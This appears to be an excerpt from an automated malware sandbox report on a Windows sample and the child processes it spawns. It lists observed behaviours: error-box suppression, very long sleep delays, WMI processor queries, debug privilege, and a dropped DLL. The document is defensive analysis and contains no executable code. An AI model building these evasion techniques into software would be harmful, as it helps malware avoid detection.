                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exe TID: 6056Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exe TID: 5236Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exe TID: 1544Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exe TID: 5812Thread sleep count: 6982 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exe TID: 5704Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exe TID: 4664Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exe TID: 2860Thread sleep count: 8854 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exe TID: 6092Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exe TID: 5648Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeDropped PE file which has not been started: C:\Users\user\Desktop\Newtonsoft.Json.dllJump to dropped file
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dllJump to dropped file
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeWindow / User API: threadDelayed 8614Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeWindow / User API: threadDelayed 9588Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeWindow / User API: threadDelayed 6982Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeWindow / User API: threadDelayed 8854Jump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Zip.exe, 00000001.00000002.376622847.000001C391CB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                  Source: nwY3YpWQVx.exe, 00000000.00000002.560867532.0000000000C18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
                  Source: update_222410.exe, 0000000C.00000002.411408741.0000000000C94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: update_222410.exe, 00000007.00000002.385190970.0000000000D32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFF
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeProcess created: C:\Users\user\AppData\Local\Temp\Zip.exe "C:\Users\user\AppData\Local\Temp\Zip.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Users\user\Desktop\nwY3YpWQVx.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
